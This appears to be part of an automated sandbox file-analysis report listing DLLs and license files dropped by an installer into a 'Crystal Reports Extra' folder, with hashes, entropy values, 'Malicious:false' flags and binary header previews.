                                                          SSDEEP:192:s4HVPM3N2zi6547iYOE6k+jLPv4IdQQXyAOiDaoL8HZwM3fxEq/Sl4eAxjf+6:s4Hmv7iE6kY4I9yAO2NL8OMBI4eAxTV
                                                          MD5:D13ADE1829C8B1A1621DB24D91F2D082
                                                          SHA1:A7BD24E809EF9BE6A37EF2BD01D23D4465E979DD
                                                          SHA-256:079952DC637DBAA9806C40A001BF5837079ADE9066F8AA18C80D23507B7E3DA3
                                                          SHA-512:33FCD64FB4881801AC269A4065C2223C0A02EEDD1132EDC0E92EF35CDCC96DB669676681C26FBF3605DD1E8982919BECA1E644935F0C2B39537CD8D2886F41BC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: GNU GENERAL PUBLIC LICENSE....Version 2, June 1991....Copyright (C) 1989, 1991 Free Software Foundation, Inc. 51 Franklin St, Fifth..Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute..verbatim copies of this license document, but changing it is not allowed.....Preamble....The licenses for most software are designed to take away your freedom to share..and change it. By contrast, the GNU General Public License is intended to..guarantee your freedom to share and change free software--to make sure the..software is free for all its users. This General Public License applies to most..of the Free Software Foundation's software and to any other program whose..authors commit to using it. (Some other Free Software Foundation software is..covered by the GNU Library General Public License instead.) You can apply it to..your programs, too.....When we speak of free software, we are referring to freedom, not price. Our..General Public Licenses are designed to make sure tha
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-KTI9L.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32585
                                                          Entropy (8bit):5.416596489081668
                                                          Encrypted:false
                                                          SSDEEP:384:5735N1fmZFO+S2uCtA2ostKbKSGQWlVsMb9XaVuXYA4iYG+mbe3FhEKoafNDhwrc:+6AuBOgPW3dasqiYGxq3FmKhrh
                                                          MD5:F68C187D209127BB0A4487B23EC29A25
                                                          SHA1:54726179BDDE7A6BD341B2BA3464E3B79CEA08C7
                                                          SHA-256:23FD4DAAB07107BFB9FD0950C0490BA65DF2FBC21680E46D9B93800E38BD1943
                                                          SHA-512:7364E67CBE7449C35930649C1B1360B88448893CCC207D1DCF5D3216F6C9CE33C9F4B0873A1E6AAC8C151A76F9D082B4C5C1E42DBA5800B789B72F74C9065540
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........x..0.....& .....L...&................tk............................. ................ .................................................x...............................H........................... ...(.......................`............................text...@K.......L.................. .P`.data...P....`.......P..............@.P..rdata.......p.......R..............@.P@/4......5............Z..............@.0@.pdata...............\..............@.0@.xdata..T............`..............@.0@.bss..................................`..edata...............d..............@.0@.idata..x............h..............@.0..CRT....X............p..............@.@..tls....h............r..............@.`..reloc..H............t..............@.0B/14..................v..............@.0B........................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-L6ITB.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):53248
                                                          Entropy (8bit):4.571289360851901
                                                          Encrypted:false
                                                          SSDEEP:384:Lo5zW/Z0L39rAzRdjfNnCuYE0myI+Stu1OooEoZj1ofV5dkn67vc6ea3bKyEeJPG:LorLSpl2HJ3orWB3F9JUsm/n
                                                          MD5:253BC53169AD46B1EAFB92982BA7268E
                                                          SHA1:3F2F8C6324480B1F39C7BC06B8503FEEDFE5DEF4
                                                          SHA-256:CA513F09B64F8E3DC8EE09663854ADF7E4E84544133D07A3A2EF55701ABFAD4C
                                                          SHA-512:AB6847F2B7E07E85D555B313D63F74D4E74E50EA09EF32FE427822A25ECA12264A49347428D32F42ED65C669C28DAC426310BBD401A21C03177BD9729CFB5E08
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...YA1G...........!......... ........... ........... ....................................@.....................................S.......0............................................................................ ............... ..H............text........ ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-MMNOC.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):6.049364088538635
                                                          Encrypted:false
                                                          SSDEEP:384:RHKAwDe/yMw0U0GuOI+KDYZ1EWsLKkSqPmMmg2oes9yzCuFYh3oDqLjBISO0IqMU:RHKAm0UsO76WsxDmELsCDIMiH3YN
                                                          MD5:928C9EEA653311AF8EFC155DA5A1D6A5
                                                          SHA1:27300FCD5C22245573F5595ECBD64FCE89C53750
                                                          SHA-256:6DC4BEE625A2C5E3499E36FE7C6FF8EAD92ADF6AAE40C4099FDC8EF82E85B387
                                                          SHA-512:0541D706BB53F8A04C78FCF327C4557553FA901D645AD2FD446E79753B4729F1E36793F42FBDD9B5E92073A30ED9A3DD853773A06EBEA8E9302ECE91A6C5362C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#.....f.........................a.................................Y........ .........................................d............................................................................................................text....e.......f..................`.0`.data................j..............@.0..bss....p.............................0..edata...............l..............@.0@.idata...............|..............@.0..rsrc...d...........................@.0..reloc..............................@.0B........................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-N95UU.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):147456
                                                          Entropy (8bit):5.132194016685221
                                                          Encrypted:false
                                                          SSDEEP:3072:Ju6aJX0iugleTtmPzeLmQlV9MxSh356/JwQ3QklkuSmpKFb4NbkR2:9aJX0i9PaLmQlVxhw53w5bsbk
                                                          MD5:D817A6EC84CC47899F249B2C03B5F985
                                                          SHA1:5EBF96041A694C85BAD7F71F0679F64700EE272E
                                                          SHA-256:0A5DC4026BCEEB4AFDDDD73E3E16CC7224B2640E86A379D9AFE6E5A81CE1ECDC
                                                          SHA-512:96D161C7844304D4466384F5A25E27E54F0A79FEFC51E0656746837D31772EB84AB203E13686391B5FA0126F0F3C705876C1C1AE8EEF4E4F0EC67C8C379918A2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9..F...........!......... ......n-... ...@....... .......................................................................-..S....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......0..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-OSEV1.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):183312
                                                          Entropy (8bit):6.740673842072804
                                                          Encrypted:false
                                                          SSDEEP:3072:8vvDF1nexZZNNi2k7EBSh2BL5BvgjTSxUCwb5bL8Bu1A5d:8nDF1nexZZBk7Rhi8jTnLMu1A/
                                                          MD5:E9644E54C403DD5C0EF89C85ADA3E295
                                                          SHA1:A42708B2837DBA534E4CB866266E4959B28DA452
                                                          SHA-256:72ECD276B372487AF75C67877ECCC0ED4D15F2C07FFA7F631D8056038D0E8122
                                                          SHA-512:22411A9E8A9F7082B4CF90C3C906E414B62B4BD2B9B10EA1694EC5651E3DEC8D2E4716354F5B09D6396F4C094555F5F08B26534647A98DFA7B3039D6C1E219F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f|..f|..f|..o.<.E|..o.-..|..f|..8|..A..c|..o.;..|..o.*.g|..o.).g|..Richf|..........................PE..L.....{Y...........!.................?..............................................(................................`..V...|Y..<....................................................................T..@...............@............................text............................... ..`.rdata...e.......f..................@..@.data....B.......&...h..............@....reloc...&.......(..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-Q7NRR.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4506112
                                                          Entropy (8bit):6.845537378265025
                                                          Encrypted:false
                                                          SSDEEP:98304:FNk4pd+tbCY0HAYYid0wHYNkzi5bbTGksCWj:Yud+tWYOYezi5rGkn6
                                                          MD5:BD67B10210CEE1EC1F07A6CFD1954C77
                                                          SHA1:6DF09D5D96BF13F7A1515031AC5DF116F1159A48
                                                          SHA-256:EC6C0F1448E3C2A27BC67C354E1315A1E9088E4E517D099F87036E728B084AD2
                                                          SHA-512:BE053FB03C6123F6DB7FA4E3024A5C632007D516CF430ECA221387A77A2EA91A36976DA38467B5CAD4331E3ED7034E6D0686E323BD56CF2C439378A76288ED34
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......>.f.zz..zz..zz..(...xz..(...qz..(...rz..(...~z..n...yz..s...jz..n...oz..zz..3{..,....z..,...{z..,...{z..,...{z..Richzz..ty......tyN.....ty......Rich............PE..L...u.Ra...........!.....b2..\................2..............................@E......QC...@......................... .?.L...l.?.......A.......................B.TR..`.=.p.....................=......=.@.............2..............................text...Ua2......b2................. ..`.rdata..2{....2..|...f2.............@..@.data.........@.......?.............@....rsrc.........A.......@.............@..@.reloc..TR....B..T...nB.............@..B........................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-RSFVI.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):421792
                                                          Entropy (8bit):5.89089312168092
                                                          Encrypted:false
                                                          SSDEEP:6144:IBv/Y6oqGY2NID1MMf07QxjopowBvBBvm:IBv/Y6oiYIup7QVopowBvBBvm
                                                          MD5:10F4396344E93CE328529A26CC026082
                                                          SHA1:51895B0BE7B772EBE747336E4E0F57D8BBC5D277
                                                          SHA-256:5CA366D8C7102434E6D8E80C30BA3B4FD99AB5082C629C95D7F870DD8F0F8A27
                                                          SHA-512:770A801011E2FCA3052AF437CAE4930A1BCAF2CAE55FFC7A29249196B26AF7599551BDE4C7CEBDB6472E1A400182E711B9590CBAC90A9F28C7F10FBE37FA064D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: GNU GENERAL PUBLIC LICENSE. Version 3, 29 June 2007.. Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed... Preamble.. The GNU General Public License is a free, copyleft license for.software and other kinds of works... The licenses for most software and other practical works are designed.to take away your freedom to share and change the works. By contrast,.the GNU General Public License is intended to guarantee your freedom to.share and change all versions of a program--to make sure it remains free.software for all its users. We, the Free Software Foundation, use the.GNU General Public License for most of our software; it applies also to.any other work released this way by its authors. You can apply it to.your programs, too... When we speak of free software, we are referring to
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-TECE4.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):7182
                                                          Entropy (8bit):3.851683776363626
                                                          Encrypted:false
                                                          SSDEEP:96:AT0nsNJmBwoCtrOEhXpOITI151ihv2idiG:83KwoCtrOESITI151ihvtp
                                                          MD5:A5A239C980D6791086B7FE0E2CA38974
                                                          SHA1:DBD8E70DB07AC78E007B13CC8AE80C9A3885A592
                                                          SHA-256:FB33C708C2F83C188DC024B65CB620D7E2C3939C155BC1C15DC73DCCEBE256B7
                                                          SHA-512:8667904DDA77C994F646083EF39B1F69C2961758C3DA60CECADFE6D349DD99934C4D8784F8E38AE8B8C9EB9762EDD546F2A7B579F02612578F8049E9D10E8DA7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#......................... .....o......................................... ......................`..x....p.......................................................................................................................text...`...........................`.P`.data........ ......................@.0..rdata.......0......................@.0@/4...........@......................@.0@.bss.........P........................@..edata..x....`......................@.0@.idata.......p......................@.0..reloc..............................@.0B................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-VO510.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):95232
                                                          Entropy (8bit):6.030616936830931
                                                          Encrypted:false
                                                          SSDEEP:1536:2LUkWfOuFIGlk4dltwXg2/y8fN3SOpynIS9384xZLr0alK3TVzVf1JJKDo7wvaJT:2LVWfOuSItk3/hZS1d/04CTpVf1JJKDC
                                                          MD5:8C72FC2D0C83E1698B0FC50775310B16
                                                          SHA1:D8C49BB33E9239CFBD76FFCCE8A95485A90A46BF
                                                          SHA-256:31A3DDED0E009827E09BE2B2BEC6FC033CB06C147AF67FBE818EA82FD5541BE2
                                                          SHA-512:B9630C7B6E53B276FC0C101E054530E51493989870AEAD05207BA4CE36BCEA946DDDB0B130EF5A2379F10930DCA4AF2036E32AF75FF38D6430145D89AE9E0B37
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...|.+T...........".........p................ld.............................................. .........................................................l....`..h...............p........................... ...(...................@................................text...............................`.P`.data...............................@.`..rdata.. 5... ...6..................@.`@.pdata..h....`.......4..............@.0@.xdata.......p.......B..............@.0@.bss....0.............................`..edata...............N..............@.0@.idata...............Z..............@.0..CRT....X............h..............@.@..tls....h............j..............@.`..rsrc...l............l..............@.0..reloc..p............r..............@.0B................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libbson-1.0.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):183312
                                                          Entropy (8bit):6.740673842072804
                                                          Encrypted:false
                                                          SSDEEP:3072:8vvDF1nexZZNNi2k7EBSh2BL5BvgjTSxUCwb5bL8Bu1A5d:8nDF1nexZZBk7Rhi8jTnLMu1A/
                                                          MD5:E9644E54C403DD5C0EF89C85ADA3E295
                                                          SHA1:A42708B2837DBA534E4CB866266E4959B28DA452
                                                          SHA-256:72ECD276B372487AF75C67877ECCC0ED4D15F2C07FFA7F631D8056038D0E8122
                                                          SHA-512:22411A9E8A9F7082B4CF90C3C906E414B62B4BD2B9B10EA1694EC5651E3DEC8D2E4716354F5B09D6396F4C094555F5F08B26534647A98DFA7B3039D6C1E219F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f|..f|..f|..o.<.E|..o.-..|..f|..8|..A..c|..o.;..|..o.*.g|..o.).g|..Richf|..........................PE..L.....{Y...........!.................?..............................................(................................`..V...|Y..<....................................................................T..@...............@............................text............................... ..`.rdata...e.......f..................@..@.data....B.......&...h..............@....reloc...&.......(..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libffi-6.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32585
                                                          Entropy (8bit):5.416596489081668
                                                          Encrypted:false
                                                          SSDEEP:384:5735N1fmZFO+S2uCtA2ostKbKSGQWlVsMb9XaVuXYA4iYG+mbe3FhEKoafNDhwrc:+6AuBOgPW3dasqiYGxq3FmKhrh
                                                          MD5:F68C187D209127BB0A4487B23EC29A25
                                                          SHA1:54726179BDDE7A6BD341B2BA3464E3B79CEA08C7
                                                          SHA-256:23FD4DAAB07107BFB9FD0950C0490BA65DF2FBC21680E46D9B93800E38BD1943
                                                          SHA-512:7364E67CBE7449C35930649C1B1360B88448893CCC207D1DCF5D3216F6C9CE33C9F4B0873A1E6AAC8C151A76F9D082B4C5C1E42DBA5800B789B72F74C9065540
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........x..0.....& .....L...&................tk............................. ................ .................................................x...............................H........................... ...(.......................`............................text...@K.......L.................. .P`.data...P....`.......P..............@.P..rdata.......p.......R..............@.P@/4......5............Z..............@.0@.pdata...............\..............@.0@.xdata..T............`..............@.0@.bss..................................`..edata...............d..............@.0@.idata..x............h..............@.0..CRT....X............p..............@.@..tls....h............r..............@.`..reloc..H............t..............@.0B/14..................v..............@.0B........................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgmodule-2.0-0.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41984
                                                          Entropy (8bit):6.132770955803513
                                                          Encrypted:false
                                                          SSDEEP:768:bgaowTgGpoQHcE4UJmcCqr7/rz/WGc4kedF0emlBQQhpjxH:bgsppvHc1Cb7ldnmlBQkdH
                                                          MD5:4D233A220F91DE3B1510D017B5481942
                                                          SHA1:C59F449B0D09127D18268E7B07DA3F7D749B2720
                                                          SHA-256:08336089E280805C8AC89F7476526F944B5868C014748B6DC29F65167E9E3AB0
                                                          SHA-512:A86A1F9B5D160813C6E2F771962F303428604057B9613021BF7844C1204CFCA0A18571A28D950D7999ACC4ECDE0605095F9A460A9B79FE2BBE02F080C2683923
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#.....t..........0..............m......................... ................ .........................O...............p.......................@.......................................................p............................text....s.......t..................`.P`.data...T............x..............@.0..rdata..,............z..............@.`@.bss..................................`..edata..O...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...p...........................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgpg-error6-0.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):95232
                                                          Entropy (8bit):6.030616936830931
                                                          Encrypted:false
                                                          SSDEEP:1536:2LUkWfOuFIGlk4dltwXg2/y8fN3SOpynIS9384xZLr0alK3TVzVf1JJKDo7wvaJT:2LVWfOuSItk3/hZS1d/04CTpVf1JJKDC
                                                          MD5:8C72FC2D0C83E1698B0FC50775310B16
                                                          SHA1:D8C49BB33E9239CFBD76FFCCE8A95485A90A46BF
                                                          SHA-256:31A3DDED0E009827E09BE2B2BEC6FC033CB06C147AF67FBE818EA82FD5541BE2
                                                          SHA-512:B9630C7B6E53B276FC0C101E054530E51493989870AEAD05207BA4CE36BCEA946DDDB0B130EF5A2379F10930DCA4AF2036E32AF75FF38D6430145D89AE9E0B37
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...|.+T...........".........p................ld.............................................. .........................................................l....`..h...............p........................... ...(...................@................................text...............................`.P`.data...............................@.`..rdata.. 5... ...6..................@.`@.pdata..h....`.......4..............@.0@.xdata.......p.......B..............@.0@.bss....0.............................`..edata...............N..............@.0@.idata...............Z..............@.0..CRT....X............h..............@.@..tls....h............j..............@.`..rsrc...l............l..............@.0..reloc..p............r..............@.0B................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgthread-2.0-0.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):6.027050012874634
                                                          Encrypted:false
                                                          SSDEEP:768:bKZB2wewH8k43RncCqCbj9zAwLc0N+eD5JemQRR5Q7:bKZr5H8VmuECDGmQRR5Q7
                                                          MD5:CF2571C125FA1D2EC55B9977054F380A
                                                          SHA1:91014DD50F0EEB0D3D1FAED77541C76A05B712B8
                                                          SHA-256:02B817B6DB18DB2DFCCEFDD08EED64A696E2BF326F4120EE7E93AE6AA73BCCB3
                                                          SHA-512:A95BF3436EA2FAC443924C5FC31FCD4337A44702EF38CA82D744474301E53F14721EAEB0F21E515CCFF8569E7B7D81107FB5A4CF2AE485CD4A5D2DC95DAE8F9B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..V...........#.....d..........0..............e................................8......... .....................................................................................................................`................................text....b.......d..................`.P`.data...D............h..............@.0..rdata..,............j..............@.`@.bss..................................`..edata...............v..............@.0@.idata...............x..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libintl-8.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):120774
                                                          Entropy (8bit):6.037077757732975
                                                          Encrypted:false
                                                          SSDEEP:3072:nPE0Yx2cwD/Dtixvr6FkTwCD4N8FBKd8UR:sMzD/amFE4NQKd8UR
                                                          MD5:082A8171C726E58C1618DA3781AB7833
                                                          SHA1:5D74E7F8F5E14C1A70331A03456C68BB33AC17E2
                                                          SHA-256:AE1A1179289D1AB3B406F4BB347284464123C51BE50C1BCF38F2B5DD691E065C
                                                          SHA-512:837433AA29DFF1BD35AEB800B8DC69FB881BB2C435BF5BBA0AD7E809AD4CEA765B179DB4024A53F92E6B905FC964F23ED79949FA84424F864BBB88F140BD8682
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........o.....& ...........................a.............................P................ .................................................x.... .......................0.............................. ...(.......................P............................text...`........................... .P`.data........ ......................@.`..rdata...h...0...j..................@.`@/4......5...........................@.0@.pdata..............................@.0@.xdata..............................@.0@.bss..................................`..edata..............................@.0@.idata..x...........................@.0..CRT....X...........................@.@..tls....h...........................@.`..rsrc........ ......................@.0..reloc.......0......................@.0B/14..........@......................@.0B................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libmongoc-1.0.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):232976
                                                          Entropy (8bit):6.644092741800531
                                                          Encrypted:false
                                                          SSDEEP:6144:VBx0S/dXV86pr06/oG5NMR2jzm1YunTcUmAe0I70s0cYJyUqQmoUjW2v4ZzuFdA:hldXVjTD/m1YunTcZAe0I70s0cYQUqoX
                                                          MD5:A80D629D6329DC31D5CB1157D853AFAB
                                                          SHA1:A2FA781452106CDF17A83E3E59C6FE50D557E62C
                                                          SHA-256:500EE04865DBB7BEB9474E0C2AEBD6713DF4407C849EC134457C7D0CA289FAF0
                                                          SHA-512:4E0253615D4C3C418B93547370F416EDF5326BF66E3A5872C687B129E65E5967DC3D4AE97CF524CA5E77327B0CE07D93BA63470D541614A6685EBD26E0C7427B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gSg.#2.,#2.,#2.,*J.,.2.,*J.,:2.,..r,'2.,*J., 2.,#2.,.2.,*J.,.2.,*J.,"2.,*J.,"2.,Rich#2.,........PE..L.....{Y...........!................X................................................3...............................+... ......P....................x..................................................@............... ............................text...p........................... ..`.rdata..c...........................@..@.data...D2...P.......<..............@....reloc...$.......&...R..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libnettle-4-6.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):182365
                                                          Entropy (8bit):6.791628337519772
                                                          Encrypted:false
                                                          SSDEEP:3072:FiP8zpgWMwBsaEcWfsUGPWTSMqqDVw7P3FwBP1ELFy:Fu8NsgsidwxqqDVMFwBaFy
                                                          MD5:854C550450BEDDEBAAFE1DD74F073641
                                                          SHA1:3DB1545773EA7756D6A87B3693148ABCD1CDAB86
                                                          SHA-256:8561D32E30B3DEC9FFD24B1BD87E96444FD6D3D304D64F80C6D99E112411DC48
                                                          SHA-512:42AF4079F184A0F8E22689F55DFA225F10B20FF8C0816D728CE022573E5EF1F1412B87000F0EF375D7DFC2A1D734A2047D539597EA4FE8EF1D5A2895053C50D1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...z.......8.....& ..........................pj.............................@.......I........ .................................................`............................ .............................. ...(....................................................text............................... .P`.data...P...........................@.P..rdata..............................@.`@/4......5............p..............@.0@.pdata...............r..............@.0@.xdata..............................@.0@.bss....0.............................`..edata........... ..................@.0@.idata..`...........................@.0..CRT....X...........................@.@..tls....h...........................@.`..reloc....... ......................@.0B/14..........0......................@.0B........................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libogg-0.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):46592
                                                          Entropy (8bit):6.294286952115658
                                                          Encrypted:false
                                                          SSDEEP:768:BZIF0ff+vrzUHQH/E4zR2cCqz7iDz3Kocq8eeIKKem+nH3g/i3/:BWFsf+vrzUwH/15EzFeIWm+H3R3
                                                          MD5:84E8E72572D53558D52403011FA0D388
                                                          SHA1:865160DA7DBFAAEA224541EB44E9430E1A7B7B20
                                                          SHA-256:CA717B5CF2A7B0E047AABAD985C631278941C58F16E2E9650CA12C3A331FCD4F
                                                          SHA-512:47EE932BFA4EE3C51C3828EF8C6923E5B946966AD8E255BC2C53A60443AA2D4AB17521F21912A6F0469C7898D6543DC4B1783A86DDB5A84568818A7B37EC3992
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..V...........#................0.............hp......................... ................ .................................P...............................,...................................................4................................text...d...........................`.P`.data...D...........................@.0..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..P...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..,...........................@.0B........................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libssl-40.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4506112
                                                          Entropy (8bit):6.845537378265025
                                                          Encrypted:false
                                                          SSDEEP:98304:FNk4pd+tbCY0HAYYid0wHYNkzi5bbTGksCWj:Yud+tWYOYezi5rGkn6
                                                          MD5:BD67B10210CEE1EC1F07A6CFD1954C77
                                                          SHA1:6DF09D5D96BF13F7A1515031AC5DF116F1159A48
                                                          SHA-256:EC6C0F1448E3C2A27BC67C354E1315A1E9088E4E517D099F87036E728B084AD2
                                                          SHA-512:BE053FB03C6123F6DB7FA4E3024A5C632007D516CF430ECA221387A77A2EA91A36976DA38467B5CAD4331E3ED7034E6D0686E323BD56CF2C439378A76288ED34
                                                          Malicious:false
                                                          Reputation:unknown
